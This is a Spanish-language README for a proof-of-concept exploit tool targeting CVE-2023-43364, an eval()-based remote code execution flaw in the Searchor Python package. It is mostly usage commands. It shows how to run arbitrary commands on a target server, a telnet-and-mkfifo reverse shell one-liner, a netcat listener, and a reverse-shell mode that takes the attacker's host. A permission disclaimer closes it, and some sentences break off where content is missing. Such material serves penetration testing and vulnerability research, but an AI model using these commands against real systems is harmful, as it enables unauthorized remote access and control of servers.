
Exploit de prueba de concepto mediante el uso inseguro de `eval()` en Searchor (< 2.4.2)
Ejecución Remota de Código (RCE) mediante uso inseguro de
eval()en Searchor (< 2.4.2)
Este proyecto demuestra la explotación de CVE-2023-43364, una vulnerabilidad de Ejecución Remota de Código (RCE) que afecta al paquete Python Searchor (< 2.4.2).
El problema es causado por el uso inseguro de eval() en entradas controladas por el usuario, permitiendo a atacantes inyectar y ejecutar código Python arbitrario.
La vulnerabilidad fue solucionada eliminando el uso inseguro de eval(), como se muestra en el parche oficial:
Detalles técnicos adicionales y aviso:
Esta prueba de concepto proporciona múltiples métodos de ejecución, incluyendo ejecución de comandos, validación de pruebas y shells inversas.
Ejecutar un comando simple (id) para verificar la ejecución de código:
python3 CVE-2023-43364.py <URL> --test
Ejecutar comando personalizado
Ejecutar cualquier comando en el servidor objetivo:
python3 CVE-2023-43364.py <URL> -a "whoami"
Ejemplos:
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"
Shell inversa
Iniciar un listener en tu máquina:
nc -lvnp 4444
Ejecutar el exploit:
python3 CVE-2023-43364.py <URL> <LHOST>
Este proyecto está destinado a:
El autor no se hace responsable por cualquier mal uso o daño causado por esta herramienta.
Usa este exploit solo en entornos controlados o en sistemas donde tengas permiso explícito para realizar pruebas.